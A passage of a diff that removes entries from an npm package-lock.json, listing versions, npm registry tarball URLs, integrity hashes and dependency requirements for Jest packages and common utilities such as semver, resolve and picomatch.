"https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true - }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, - "pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "requires": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - } - 